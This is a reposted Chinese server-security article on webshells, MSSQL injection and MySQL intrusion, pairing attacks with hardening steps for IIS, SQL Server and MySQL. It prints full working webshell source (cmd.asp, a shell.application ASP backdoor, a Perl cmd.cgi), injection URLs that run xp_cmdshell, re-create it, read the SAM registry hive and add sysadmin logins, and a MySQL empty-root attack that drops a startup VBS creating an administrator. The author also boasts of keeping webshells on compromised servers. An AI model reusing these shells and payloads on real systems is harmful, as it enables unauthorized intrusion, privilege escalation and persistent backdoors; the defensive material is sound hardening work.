MSSQL injection attacks on servers and how to protect against them (reposted)

xiaoxiao2021-03-06  40

Author: Alpha

This article was published in issue 5 of Hacker Defense Line. It was written by several people and no names were credited; the only thing I want to say is: f*** Hacker Defense Line!

Permission settings and hackers under Windows NT systems: on the various servers on the network, as long as a hacker can successfully break in, whatever the configuration, he obtains certain permissions, for example Guest or SYSTEM permissions. Whether those permissions let him get further depends on the server: if the administrator has not configured it, or lacks management experience, the intrusion succeeds. As long as we set appropriate permissions on the various dangerous components and commands, we get the greatest possible security. Below I introduce permissions and hackers under NT systems. Of course the NT server cannot be on a FAT32 partition; your NT server must use NTFS partitions, because only NTFS lets you set permissions on the important files of your server. If it is FAT32, there is no security at all, and from the intrusion-prevention examples introduced below you will understand the importance of setting permissions.

With the rapid development of the network, many friends now have broadband, and the business of virtual host providers is of course getting better and better. More and more friends build websites. But nowadays hackers like to put a WebShell into the space of a virtual host provider to obtain management of the server, which is the biggest headache for server administrators. Through various WebShells a hacker can run cmd commands on the server, copy and delete files, edit files online, and create super users. There are many kinds of WebShell (also called web-page Trojans), such as ASP, CGI, PHP and JSP WebShells, and the now-popular xp_cmdshell and so on; all of these count as WebShells. Let us first introduce the attack and prevention methods for the various WebShells that hackers call web-page Trojans.
At the same time, this simplest of security settings can also prevent most of the overflow attacks on the network, such as the famous IDQ, IDA, WebDAV and RPC overflows..., which let hackers obtain management of your server; with this small security configuration you need not fear the hacker's overflow attacks. Even if you do not apply the patch, it is safe. Believe it? Don't believe it? Please read on! The attack and prevention methods are actually very simple, so anyone generally familiar with web development who knows cmd commands can learn them; in my opinion there is no great technical content, the difficulty level is beginner and everyone can learn it. But this tutorial can be used by any web server administrator, whether you have many years of server management experience or are a novice; it serves as a method of preventing WebShell attacks and overflow attacks.

I. Basic ASP WebShell attacks and prevention

Below we look at the ASP WebShell attack and prevention methods (and provide the WebShell source code).

Example 1: a script bound to the cmd command. This is an attack method in which a script binds the cmd command; in fact ASP WebShells do not stop here, and two more ASP WebShell attack and prevention methods follow below. As long as the hacker puts this WebShell on your server and you have no appropriate prevention method, your server will suffer and become the hacker's "broiler" (zombie). The servers that usually fall victim are those of virtual host providers, and also servers belonging to individuals or companies. How does a hacker get this WebShell onto your server? If it is uploaded into the web space of a virtual host provider, it is generally one of the provider's own customers ^_^, because the customer already has upload permission through the provider's own software and an HTTP browsing address.
The customer's purpose in using this WebShell is to see what files are stored in the server space leased by others, or to steal the whole server through this WebShell.

As for servers of individuals or companies, how is this WebShell uploaded into the server's space? Oh, generally through a script vulnerability on the server: the hacker looks for a script vulnerability in the system and uses it to upload files over the WWW port 80, or uses some vulnerability together with the TFTP service to transfer this WebShell to your server. Since here we only explain how these WebShells attack, we do not discuss how the WebShell gets into the server space; this article assumes that you have already uploaded the WebShell to the server space and obtained its HTTP browsing address. As long as the server supports it, you can use this WebShell to obtain management of the server system. This back door is very hidden: even if you reinstall N times and apply N patches it is useless, because for this "vulnerability" there is no patch ^_^. As long as this WebShell still exists and a hacker finds its WWW browsing address, your server becomes the hacker's broiler, so it is extremely harmful. As shown in the figure below, I uploaded a WebShell file named cmd.asp to a server with IP 192.168.0.18 and put it into the webshell folder under the FTP root directory, so we can use http://192.168.0.18/webshell/cmd.asp to access this WebShell. We can enter any cmd command in that blank form, such as dir c:\ and so on. If you want to create a super user on this server, you enter two commands: on the first line net user netpk hacker /add, then click the "execute the command" button to create the ordinary user netpk; then enter the second command, net localgroup administrators netpk /add, which adds the ordinary user netpk to the Administrators group, the super-user management level. From this we can see that this WebShell has all cmd command permissions. What you want to do next, I won't teach you, huh huh ^_^.

The source code for this cmd.asp script is attached:

<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
szCMD = Request.Form(".CMD")                                 ' get the cmd from the input box
On Error Resume Next                                         ' if an error occurs, skip it so no error pop-up appears
Set oScript = Server.CreateObject("WSCRIPT.SHELL")           ' create the Shell (WshShell) object
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szTempFile = "C:\" & oFileSys.GetTempName()                  ' GetTempName() is an FSO method for naming temporary files
Call oScript.Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)  ' call WshShell's Run to execute the command and redirect its output into the temporary file
Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0)   ' open the temporary file
%>
<HTML><BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="post">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="execute the command">
</FORM>
<PRE>
<%
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)              ' output the encoded file content
oFile.Close                                                  ' close the file
Call oFileSys.DeleteFile(szTempFile, True)                   ' delete the file so it cannot be seized
%>
</PRE>
</BODY></HTML>

You only need to write the above code in Notepad, save it with the .asp extension, and you can run it in your virtual host space. There are several ways to prevent this kind of script-bound cmd attack. In fact, to prevent this attack you only need to remove the FSO (Scripting.FileSystemObject) function from ASP. The method for removing FSO is to enter the following command at the cmd prompt: regsvr32 /u C:\Winnt\System32\scrrun.dll (note: change the path to your local system installation directory when you actually run it). But this method removes too much: if we ourselves want to use FSO, we cannot use it either. So I do not recommend removing FSO this way. It is obvious that if you do this, nobody, including the site's system administrator, can use the FileSystemObject object, which is not what the site manager wants, because after all we can use this object to achieve convenient online management of the platform. If the system administrator never uses it this costs nothing, but this dangerous object brings security holes to the site. So is there no good way? There is! The specific method is as follows: we can stop others from illegally using the FileSystemObject object while we can still use it ourselves. Find the key HKEY_CLASSES_ROOT\Scripting.FileSystemObject in the registry and rename it to whatever string you want (right-click → "Rename"), for example HKEY_CLASSES_ROOT\Scripting.FileSystemObject2 or HKEY_CLASSES_ROOT\Scripting.FileSystemObjectnetpk. Suppose you chose the latter: to reference the object in ASP you must now use Set fso = CreateObject("Scripting.FileSystemObjectnetpk"), and can no longer use Set fso = CreateObject("Scripting.FileSystemObject"). Anyone who calls FileSystemObject in the usual way will be unable to use it. Oh, as long as you do not tell others the changed object name, nobody else can use the FileSystemObject object.
In this way, as site managers we stop the illegal use of the FileSystemObject object while we can still use it ourselves to implement convenient online website management! But there is still some danger, because this configuration is not perfect: it only solves FSO-based calls of the cmd command and some simple ASP Trojan scripts. Bear in mind that ASP is only one kind of WebShell; CGI, PHP, JSP and so on have WebShells too, and if your server is configured to support CGI, PHP, JSP, etc., those WebShells do not need FSO at all. So read on; there are more WebShells worth noting. In fact there is a simpler and more practical method to prevent WebShells that bind the cmd command through ASP scripts: the configuration takes only 30 seconds, and the same method also prevents the CGI, PHP and JSP WebShells, the overflow attacks and so on, because one method suffices to prevent all of these script attacks and overflows.

Example 2: a WebShell that uses FSO permissions for file management, attack and prevention. Below we describe the top ASP Trojan: through the web, this WebShell can change, edit, delete, move, upload and download any file on the server online. As long as the hacker uploads this ASP Trojan, all files on your server are under the hacker's control. What can the hacker do on your server? As mentioned above: change, delete, move... As shown in the figure below. Looking at this picture, you can imagine what your server will end up like; your server has no privacy left, and whoever wants to deface your server's home page or delete files on your server can do it. This ASP Trojan can be downloaded from every hacker website on the network, and its source code is inconvenient to print here. Prevention method: the same as in Example 1, so it is not repeated here. One remaining question: for ASP WebShells, is it enough to disable FSO or rename FSO in the registry? Not at all, because there is another kind of ASP Trojan that does not require FSO support. Although it is not very powerful, for defacing a website its functions are already quite enough. For the defence against this kind of Trojan, please see Example 3 below.

Example 3: an ASP Trojan that does not need FSO. This ASP Trojan works without FSO support; lacking FSO it is of course not very powerful, it can only browse the server's file directories, copy and move files, and execute program files at a specified path. It is worth noting that most virtual host providers still have this vulnerability; it seems this hole is not well maintained by network testers. Below is the picture that appears when you browse this ASP Trojan. Even the servers of the hacker base have the same vulnerability. From my tests, you can easily obtain management rights of the hacker base, but people would say I am blackening the base, so I did not do it. (Editor comrade, you can delete what I wrote about the hacker base. The hacker base's server is not safe, and grass-roots people have come in to help them check. I just have no mood to inform those braggarts; they cannot even maintain their own server well, yet they talk about security maintenance for others. As for the hacker foundation, whether it has such holes I do not know, because I had no mood to test.) Through this FSO-free ASP Trojan you can arbitrarily copy, move and execute programs on the server. This is simple, but it is already enough to deface a website. For example, we can move the website's home page elsewhere and then copy in a hacker page with the same name. Using the execute-program function, we can make the server run any Trojan program and obtain the server's admin rights.

I give the source code of this FSO-free ASP Trojan below. The code is as follows:

<% Response.Write "Only one action can be performed at a time :)" %>
<% Response.Write Now() %>
The physical path where the program is located: <% Response.Write Request.ServerVariables("APPL_PHYSICAL_PATH") %>
<html>
<head><title>asp's shell.application backdoor</title></head>
<body>
<form action="<%= Request.ServerVariables("URL") %>" method="post">
<input type=text name=text value="<%= szCMD %>"> Enter the directory you want to browse<br>
<input type=text name=text1 value="<%= szCMD1 %>"> COPY to <input type=text name=text2 value="<%= szCMD2 %>"><br>
<input type=text name=text3 value="<%= szCMD3 %>"> MOVE to <input type=text name=text4 value="<%= szCMD4 %>"><br>
Path: <input type=text name=text5 value="<%= szCMD5 %>"> Program: <input type=text name=text6 value="<%= szCMD6 %>"><br>
<input type=submit name=sb value="send command">
</form>
</body>
</html>
<%
szCMD = Request.Form("text")                          ' directory browsing
If szCMD <> "" Then
    Set shell = Server.CreateObject("shell.application")    ' create the Shell object
    Set fod1 = shell.NameSpace(szCMD)
    Set foditems = fod1.Items
    For Each co In foditems
        Response.Write "<font color=red>" & co.Path & " ----- " & co.Size & "</font><br>"
    Next
End If
%>
<%
szCMD1 = Request.Form("text1")                        ' copy: source file
szCMD2 = Request.Form("text2")                        ' copy: destination directory
If szCMD1 <> "" And szCMD2 <> "" Then
    Set shell1 = Server.CreateObject("shell.application")   ' create the Shell object
    Set fod1 = shell1.NameSpace(szCMD2)
    For i = Len(szCMD1) To 1 Step -1                  ' split the source into directory and file name
        If Mid(szCMD1, i, 1) = "\" Then
            path = Left(szCMD1, i - 1)
            Exit For
        End If
    Next
    If Len(path) = 2 Then path = path & "\"           ' a bare drive letter needs a trailing backslash
    path2 = Right(szCMD1, Len(szCMD1) - i)
    Set fod2 = shell1.NameSpace(path)
    Set foditem = fod2.ParseName(path2)
    fod1.CopyHere foditem
    Response.Write "Command completed successfully!"
End If
%>
<%
szCMD3 = Request.Form("text3")                        ' move: source file
szCMD4 = Request.Form("text4")                        ' move: destination directory
If szCMD3 <> "" And szCMD4 <> "" Then
    Set shell2 = Server.CreateObject("shell.application")   ' create the Shell object
    Set fod1 = shell2.NameSpace(szCMD4)
    For i = Len(szCMD3) To 1 Step -1
        If Mid(szCMD3, i, 1) = "\" Then
            path = Left(szCMD3, i - 1)
            Exit For
        End If
    Next
    If Len(path) = 2 Then path = path & "\"
    path2 = Right(szCMD3, Len(szCMD3) - i)
    Set fod2 = shell2.NameSpace(path)
    Set foditem = fod2.ParseName(path2)
    fod1.MoveHere foditem
    Response.Write "Command completed successfully!"
End If
%>
<%
szCMD5 = Request.Form("text5")                        ' execute: directory of the program
szCMD6 = Request.Form("text6")                        ' execute: program name
If szCMD5 <> "" And szCMD6 <> "" Then
    Set shell3 = Server.CreateObject("shell.application")   ' create the Shell object
    shell3.NameSpace(szCMD5).Items.Item(szCMD6).InvokeVerb
    Response.Write "Command completed successfully!"
End If
%>

You only need to write the above code in Notepad, save it with the .asp extension, and you can run it in your virtual host space. The method for preventing this ASP Trojan that needs no FSO support is as follows. From the code above we can see that the shell in this code is created through Shell.Application. We only need to find the Shell.Application and WScript.Shell keys in the registry and delete them, and this type of ASP Trojan attack is prevented. Deleting these keys does not affect your server or its ASP support, so please delete them.

II. Dealing with the FSO threat

Virtual hosts nowadays disable the standard ASP component FileSystemObject, because this component gives ASP powerful file-system access: it can read, write, copy, delete and rename any file on the server's hard disk (of course, this refers to Windows NT/2000 with the default settings). But after prohibiting this component, all ASP pages that use it can no longer run, which does not meet customers' needs.
How can we allow the FileSystemObject component without affecting the security of the server (i.e. different virtual host users cannot use the component to read and write each other's files)? Here is a method I obtained through experiment, described below with Windows 2000 Server as an example. Open Explorer on the server, right-click the drive letter of each hard disk partition (volume), choose "Properties" from the pop-up menu and select the "Security" tab; there you can see which accounts can access this partition (volume) and their access rights. After a default installation, "Everyone" has full control. Add "Administrators", "Backup Operators", "Power Users", "Users" and so on and give them "Full Control" or the corresponding permissions; note that you must not give the "Guests" group or the "IUSR_machinename" account any permissions. Then delete the "Everyone" group from the list, so that only authorized groups and users can access this partition. When ASP executes it accesses the hard disk as "IUSR_machinename", and since that account has not been given permissions here, ASP cannot read or write files on the hard disk. Next, set up a separate user account for each virtual host user, and then give each account full control over only its own directory. As shown in the figure below, open "Computer Management" → "Local Users and Groups" → "Users", right-click in the right-hand pane and choose "New User" from the pop-up menu:

In the "New User" dialog box that pops up, enter "User name", "Full name", "Description", "Password" and "Confirm password" as needed, clear the check box "User must change password at next logon", and tick "User cannot change password" and "Password never expires".
In this example a built-in account "IUSR_VHOST1" is created for the first virtual host's user, i.e. the identity under which Internet Information Services handles anonymous access when clients visit this virtual host via http://xxx.xxx.xxx.xxx/. Click "Create" to finish. You can create multiple users according to actual needs; when done, click "Close":

The newly created user now appears in the account list; double-click it to set it up further:

In the "IUSR_VHOST1 Properties" dialog (i.e. the new account just created), on the "Member Of" tab: by default the account belongs to the "Users" group; select that group and click "Remove":

Now, as shown in the figure below, click "Add":

In the "Select Groups" dialog find "Guests", click "Add" so that the group appears in the text box below, and click "OK":

The result is as shown below; click "OK" to close this dialog:

Open Internet Information Services and start setting up the virtual host; in this example the "first virtual host" is used. Right-click the host name and choose "Properties" from the pop-up menu:

A "first virtual host Properties" dialog pops up, from which you can see that this virtual host uses the folder F:\vhost1:

Leave the "first virtual host Properties" dialog open for now, switch to the F:\vhost1 folder, right-click it and choose "Properties" → "Security" tab. You can see that the folder's default security setting is "Everyone" full control (the content shown depends on the situation); first clear the check box "Allow inheritable permissions from parent to propagate to this object".
Remove the check mark:

At this point a "Security" warning as shown below pops up; click "Remove":

All groups and users in the "Security" tab are now empty (if not, use "Remove" to empty it); then click the "Add" button.

Add "Administrators" as shown in the figure, and add the new account "IUSR_VHOST1" created earlier, giving it full control. You may also add other groups or users according to actual needs, but never add the "Guests" group or the "IUSR_machinename" anonymous access account!

Switch back to the previously opened "first virtual host Properties" dialog, open the "Directory Security" tab and click "Edit":

In the "Authentication Methods" dialog (shown below), click "Edit":

The "Anonymous User Account" dialog pops up; the default is "IUSR_machinename". Click "Browse":

In the "Select User" dialog find the new account "IUSR_VHOST1" and double-click it:

The anonymous user name is now changed; in the password box enter the password set for this account when it was created:

Confirm the password again:

OK, done; click OK to close these dialogs. After this setting, the "first virtual host" user can use ASP's FileSystemObject component to access only its own directory, F:\vhost1; when trying to access other content there will be errors such as "no permission", "the drive is not ready" or "500 internal server error". Also: if the user needs to read the hard disk's partition capacity or the partition's serial number, this setting prevents reading them. If you want to allow reading these and other partition-wide information, right-click the hard disk partition (volume), choose "Properties" → "Security", add this user's account to the list and give it at least "Read" permission.
Since the subdirectories under this volume have been set to "do not allow inheritable permissions from the parent to propagate to this object", the permission settings of the subdirectories below are not affected.

III. WebShells based on CGI, PHP and JSP, overflow attacks, and their prevention

CGI, PHP and JSP scripts can also bind the cmd command, but are the permissions of a basic CGI WebShell and its prevention method the same as for ASP? The answer is that their WebShell permissions are the same, as is the way the scripts are used, but the method of preventing them is completely different. They do not need FSO support, so even if you disable the FSO object and remove the Shell.Application and WScript.Shell keys used by ASP WebShells from the registry, you still cannot prevent these script WebShells. Since ASP, CGI, PHP and JSP all bind the cmd command through a script, the difference between them is small, and this type of attack can be fully prevented: below I give a security configuration that can be completed within 30 seconds and stops any script from calling your cmd command remotely, thus completely preventing script-bound cmd WebShells. Here we use the CGI WebShell as a last example. As shown below, as long as a hacker uploads a cmd.cgi WebShell to your server, he can call the cmd command on your server and run any cmd command, such as creating a super user. The figure below shows running the dir c:\ command through this cmd.cgi WebShell. If a hacker has planted this thing on your server, huh, you will want to cry without tears. Even if you reinstall the server system N times and apply N more patches it is useless: as long as you do not delete this WebShell and the hacker knows its WWW browsing address, he can always use your machine as a broiler. When I invaded broilers I used to leave this thing in the other party's virtual host directory, and it never dies.
As long as the other party does not delete this WebShell, his server is always my broiler, because anti-virus software cannot find this thing. The code for this cmd.cgi is given below (many hacker sites on the network provide it for download):

use CGI qw(:standard);
print header(-charset => 'GB2312');
$cmd = param("cmd");
$out = `$cmd 2>&1`;
print start_form, textfield("cmd", $cmd, 60);
print end_form;
print pre($out);

The above is this WebShell's code; WebShells such as PHP and JSP are not introduced here, because the attack and prevention methods are similar. Through these examples we see that all these WebShells call cmd.exe under the NT system to execute commands; as long as we set certain permissions on the cmd.exe file under the NT system, huh, the hacker's WebShell becomes useless. For safety we should also set permissions on dangerous commands such as net.exe, cacls.exe, telnet.exe, tftp.exe, format.com, mountvol.exe and mshta.exe, because by default these dangerous files can be accessed and executed by users in Guests; only by setting permissions on these files can true security be ensured. By default these files are stored in the C:\Winnt\System32 directory. To set permissions, as shown below, remove all other users' access to these commands and then allow only the account you use to run them; for example, if the super user name you use is Administrator, you allow only the user named Administrator to use these commands in the permission settings.

Through these simple settings you can render useless any WebShell on your server that binds the cmd command. Simple enough.
:) It also prevents hackers, after overflowing your server, from binding the cmd command and logging in to your server. The reason is simple: take the current WebDAV overflow. In these overflow attacks the hacker, after overflowing your server, binds your server's cmd command, then logs in via telnet and obtains system management rights on your server. But after the overflow the hacker only has SYSTEM permission with which to bind your server's cmd command, and you have set the cmd command to deny SYSTEM access, allowing only the one account you chose to access cmd. So even if the hacker overflows successfully, he cannot bind your cmd command; if the hacker cannot log in to your server, your server is safe. But this is only relatively safe, because through some overflow attacks hackers can upload a reverse-connecting Trojan file to your server and run it. Oh, take the recent Serv-U overflow: if your FTP server uses Serv-U and you have not applied the latest security patch and the hacker overflows it, then instead of binding your cmd command to log in to your server, he uploads a reverse-connecting Trojan back door. With an ordinary back door the hacker connects to your server, so once a firewall is installed on your server the hacker cannot connect to the Trojan back door. But the reverse-connecting Trojan the hacker gives you connects from your server to the hacker's machine, where the hacker listens; as long as your server sends a connection request to the hacker, the hacker gains control of your server, and this reverse Trojan attack does not depend on cmd under the NT system at all. So how do we prevent this reverse-Trojan attack?
The method is simple: install a firewall that prevents reverse-connecting Trojans, such as Tianwang or BlackICE. They all prevent reverse connections, because these firewalls have a function for setting which applications may access the network: any program on the server that tries to access the network pops up a warning window, and the server operator must agree before the application may access the network, which is exactly what is needed to stop reverse Trojans. Let's take an example: suppose your server has the Tianwang firewall installed, a hacker successfully overflows your Serv-U server and sends you a reverse-connecting back-door Trojan, placed on your server as C:\mm.exe, and the hacker's IP address is 192.168.0.18. Now the hacker wants to reverse-connect to your server. As soon as the hacker runs this reverse Trojan on your server, your Tianwang firewall pops up a warning window, as shown below:

In this warning window we can see the hacker's real IP address, the protocol used by the reverse Trojan, and the location of the reverse-connecting Trojan on your server. As long as you click the "Forbid" button, this program cannot connect to the hacker's machine. I believe you will not be so stupid as to click "Allow" and let this back door connect to the hacker's machine; as long as you do not click "Allow", the back door will not connect to the hacker's machine. :) Through this example we can see that as long as we set permissions on some dangerous commands such as cmd, and then install a firewall that prevents reverse-connecting Trojans, those so-called overflow attacks cannot harm your server.

IV. MSSQL injection protection (this part written by member Alpha)

MSSQL injection is a rather direct and harmful attack method; the so-called hackers can use it directly to obtain system privileges.
Today let's look at how to prevent this attack through system settings. First: this alone does not guarantee your server is safe; security is a whole, but the whole is made up of these parts!

Countermeasure 1

Pseudo-hacker: Suppose this page can be injected: http://localhost/bbs/news.asp?id=5. We tend to attack with
http://localhost/bbs/news.asp?id=5;exec master.dbo.xp_cmdshell 'net user alpha /add'--
http://localhost/bbs/news.asp?id=5;exec master.dbo.xp_cmdshell 'net localgroup administrators alpha /add'--
OK, alpha is already a system administrator!

Manager: How to prevent it? Look at how they do it: by calling xp_cmdshell, an extended stored procedure in SQL Server (as shown below)!

We only need to right-click and delete this extended stored procedure, and the attack above no longer works! Of course you can also use the following: sp_dropextendedproc 'xp_cmdshell' to remove xp_cmdshell.

Countermeasure 2

Hacker's countermeasure: if the xp_cmdshell extended procedure has been deleted from the MSSQL database, don't be afraid, we still have a way!
http://localhost/bbs/news.asp?id=5;exec master.dbo.sp_addextendedproc xp_cmdshell, @dllname='xplog70.dll';--
With this one line of ours, xp_cmdshell is restored.

Manager: Damn, it seems our setting was not complete enough. Search directly for xplog70.dll on drive C:

I found it and deleted it. OK, the world is quiet; at least they can no longer execute system commands directly!!

Countermeasure 3

Pseudo-hacker: Do you think that is all? You are wrong, huh huh, I still have plenty! As long as you use the sa account, I still have a method:
http://localhost/bbs/news.asp?id=5;exec xp_regread 'HKEY_LOCAL_MACHINE','SECURITY\SAM\Domains\Account','F'
Look, maybe we can get the administrator's password! And adding a startup item is naturally no problem either.
Manager: It seems I have to keep going. Watch me: I delete all of these extended procedures:
xp_regaddmultistring (add an item to the registry)
xp_regdeletekey (remove a key from the registry)
xp_regdeletevalue (remove a value from the registry)
xp_regenumvalues (enumerate the values under a key)
xp_regread (read a value under a key)
xp_regremovemultistring (remove an item from the registry)
xp_regwrite (write data to the registry)
So arrogant, huh; you want into the registry? There is no door!

Countermeasure 4

Pseudo-hacker: You won't let me into the registry, but what stops me doing something else? Can I add a SQL administrator? Really!
http://localhost/bbs/news.asp?id=5;exec master.dbo.sp_addlogin alpha;--
http://localhost/bbs/news.asp?id=5;exec master.dbo.sp_password null,alpha,alpha;--
http://localhost/bbs/news.asp?id=5;exec master.dbo.sp_addsrvrolemember sysadmin,alpha;--
See? The day xp_cmdshell can be used again, I will be the administrator!

Manager: Forget it, I won't play with you. Why must I connect to the database as sa? I create a low-privilege account instead: for example, create a database named bbs, then create a login named bbs, assign it to the bbs database as a user, and give it only some basic permissions.

OK, if you use this user to connect to the bbs database, it is much more secure than using sa!
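The manager's side of the four countermeasures above, collected into one T-SQL script as an added example for this repost (it is not Alpha's own code): it assumes SQL Server 2000, a database and a login both named bbs as in the text, and a table dbo.news read by news.asp; the table name, its columns and the password are placeholders. The last part goes one step beyond the text by showing the query of news.asp written with a typed parameter, which is what stops the ;exec ... payload from being parsed as a second statement in the first place.

```sql
-- Added example (not from the original article). Assumes SQL Server 2000,
-- a database named bbs and a login named bbs as in the text; the table
-- dbo.news, its columns and the password are placeholders.
USE master
GO

-- Countermeasures 1 and 2: drop xp_cmdshell. Dropping the procedure alone is
-- not enough while xplog70.dll stays on disk (sp_addextendedproc re-creates
-- it), so the DLL in the SQL Server Binn directory must be removed as well.
IF OBJECT_ID('master.dbo.xp_cmdshell') IS NOT NULL
    EXEC sp_dropextendedproc 'xp_cmdshell'
GO

-- Countermeasure 3: drop the registry extended procedures named in the text.
EXEC sp_dropextendedproc 'xp_regaddmultistring'
EXEC sp_dropextendedproc 'xp_regdeletekey'
EXEC sp_dropextendedproc 'xp_regdeletevalue'
EXEC sp_dropextendedproc 'xp_regenumvalues'
EXEC sp_dropextendedproc 'xp_regread'
EXEC sp_dropextendedproc 'xp_regremovemultistring'
EXEC sp_dropextendedproc 'xp_regwrite'
GO

-- Countermeasure 4: the web application connects as a low-privilege login,
-- never as sa. The login is a user of bbs only and holds no server role.
EXEC sp_addlogin 'bbs', '<strong password placeholder>', 'bbs'
GO
USE bbs
GO
EXEC sp_grantdbaccess 'bbs'
-- Grant only what news.asp needs: reading the news table.
GRANT SELECT ON dbo.news TO bbs
-- Make sure the account did not end up in sysadmin by accident.
IF IS_SRVROLEMEMBER('sysadmin', 'bbs') = 1
    EXEC sp_dropsrvrolemember 'bbs', 'sysadmin'
GO

-- Audit: list every login, its password hash, creation date and sysadmin
-- flag. A login you did not create (alpha in the text) is the trace of the
-- sp_addlogin / sp_addsrvrolemember injection.
USE master
SELECT name, password, createdate, sysadmin
FROM syslogins
ORDER BY name
GO

-- Application side (beyond the text): news.asp builds its SQL by gluing the
-- id from the URL into the statement. With a typed parameter the value
-- "5;exec master.dbo.xp_cmdshell ..." is not valid for an int and is
-- rejected instead of being executed as a second statement.
DECLARE @id int
SET @id = 5          -- in ASP: reject Request("id") unless IsNumeric() is true
EXEC sp_executesql N'SELECT title, body FROM dbo.news WHERE id = @id',
                   N'@id int', @id = @id
GO
```

Run the script as a sysadmin in Query Analyzer or osql; the bbs login is then what the connection string of news.asp uses. Because the bbs login only has SELECT on one table, even an injection that does get through can no longer reach master.dbo.sp_addlogin or the registry procedures.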
There are many other such measures, for example removing the extra system stored procedures:

sp_bindsession sp_cursor sp_cursorclose sp_cursorfetch sp_cursoropen sp_cursoroption sp_getbindtoken sp_GetMBCSCharLen sp_IsMBCSLeadByte sp_OACreate sp_OADestroy sp_OAGetErrorInfo sp_OAGetProperty sp_OAMethod sp_OASetProperty sp_OAStop sp_replcmds sp_replcounters sp_repldone sp_replflush sp_replstatus sp_repltrans sp_sdidebug xp_availablemedia xp_cmdshell xp_deletemail xp_dirtree xp_dropwebtask xp_dsninfo xp_enumdsn xp_enumerrorlogs xp_enumgroups xp_enumqueuedtasks xp_eventlog xp_findnextmsg xp_fixeddrives xp_getfiledetails xp_getnetname xp_grantlogin xp_logevent xp_loginconfig xp_logininfo xp_makewebtask xp_msver xp_perfend xp_perfmonitor xp_perfsample xp_perfstart xp_readerrorlog xp_readmail xp_revokelogin xp_runwebtask xp_schedulersignal xp_sendmail xp_servicecontrol xp_snmp_getstate xp_snmp_raisetrap xp_sprintf xp_sqlinventory xp_sqlregister xp_sqltrace xp_sscanf xp_startmail xp_stopmail xp_subdirs xp_unc_to_drive

and periodically checking the user logins:

use master
select name, password, accdate from syslogins order by name

That's all for today! In fact there is much more to defending against MSSQL injection attacks, for example exporting special files or cracking the website password; it is too much to cover, so today only these points are introduced briefly. And I even want to say: even with these settings your system is still dangerous, still fragile! For a safer configuration, keep following Server Focus!

5. Simple MySQL database intrusion prevention (this article was written by Server Focus member Lonely, and is a bit rough). On the network, many systems (Win2K, Linux) have a MySQL database installed.
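The periodic login check above, generalized to the catalog views that replaced syslogins. This is an added example, not part of the original article; it runs on SQL Server 2005 or later against master and covers each thing the four countermeasures were trying to prevent.

```sql
-- Added example (not from the article): a periodic audit, extending the
-- article's "select name, password, accdate from syslogins". SQL Server 2005+.
USE master;

-- a) Every server login, when it was created and last changed. Replaces the
--    syslogins query; password hashes themselves are not worth listing.
SELECT name, type_desc, create_date, modify_date, is_disabled
FROM sys.server_principals
WHERE type IN ('S', 'U', 'G')      -- SQL login, Windows login, Windows group
  AND name NOT LIKE '##%'          -- skip internal certificate-mapped logins
ORDER BY create_date DESC;

-- b) Who is sysadmin? An unexpected row here is what countermeasure 4
--    (sp_addlogin + sp_addsrvrolemember through an injection) produces.
SELECT r.name AS role_name, m.name AS member_name, m.create_date
FROM sys.server_role_members rm
JOIN sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.create_date DESC;

-- c) SQL logins whose password is empty (the MySQL section's problem, MSSQL
--    edition). PWDCOMPARE returns 1 when the clear text matches the hash.
SELECT name
FROM sys.sql_logins
WHERE PWDCOMPARE('', password_hash) = 1;

-- d) Is xp_cmdshell currently switched on? (countermeasures 1 and 2)
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';         -- value_in_use = 0 is the safe state

-- e) Which extended stored procedures can PUBLIC still execute?
--    (countermeasure 3; type 'X' = extended stored procedure, class 1 = object)
SELECT o.name
FROM sys.all_objects o
JOIN sys.database_permissions p ON p.class = 1 AND p.major_id = o.object_id
JOIN sys.database_principals dp ON dp.principal_id = p.grantee_principal_id
WHERE o.type = 'X'
  AND dp.name = 'public'
  AND p.permission_name = 'EXECUTE'
  AND p.state = 'G'
ORDER BY o.name;
```

Run it on a schedule and diff the output against the previous run: a new row in (b), a 1 in (d) or a registry procedure reappearing in (e) is the signal that one of the injections described above has succeeded.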
Indeed, this database is very popular, but such a popular database has a vulnerability: the database root account's password is empty, and many machines have this problem today.

I scanned a class C address range and found more than 89 machines whose database root password was empty. Because MySQL cannot call a system shell the way MSSQL's xp_cmdshell can, many people who find this vulnerability do not use it. Let me introduce how to use a Win2K machine whose database root password is empty:

If MySQL is installed on your machine, you can use the following command:

#mysql -u root -h 192.168.0.1

After the connection succeeds, see which databases the server has:

mysql> show databases;

MySQL has the two databases mysql and test.

mysql> use test;

After entering test, see what tables there are:

mysql> show tables;

Then I create a new table inside it:

mysql> create table lonely (abc text);

Here I created a table named lonely with a single text field abc. We write the commands that add the user admin with password 123, as follows:

mysql> insert into lonely values("set wshshell=createobject(""wscript.shell"")");
mysql> insert into lonely values("a=wshshell.run(""cmd.exe /c net user admin 123 /add"",0)");
mysql> insert into lonely values("b=wshshell.run(""cmd.exe /c net localgroup administrators admin /add"",0)");

Check whether anything is wrong:

mysql> select * from lonely;

Output the table as a VBS script file:

mysql> select * from lonely into outfile "c://docume~1//alluse~1//[Start] menu//Program//ceshi.vbs";

This writes the contents of the table into the startup group as a VBS script file! Note the "/" symbol. Now all the work is done: when the machine restarts, ceshi.vbs runs at startup, and the machine has a superuser named admin with password 123.

Defense method: the easiest defense against this attack is to set a password for the MySQL root user.
The method is as follows. Set the password locally:

mysqladmin -u root password password

Set the password remotely:

grant select, update, delete on *.* to root@"host" identified by "password"

For example:

mysql> grant select, update, delete on *.* to root@"host" identified by "123";
Query OK, 0 rows affected (0.34 sec)

Editor: I hope this gives some help to all my friends. It has many shortcomings; because I don't have much time, I could not write it in more detail. If you want to learn more about server attack and defense, please visit the Server Focus website http://www.serverfocus.net or http://www.cnhack.cn. Questions and suggestions can be sent by e-mail to Netpk@cnhack.cn

(Transferred from http:/blog.9cbs.net/amh/archive/2004/12/205072.aspx, Saibui's personal website)
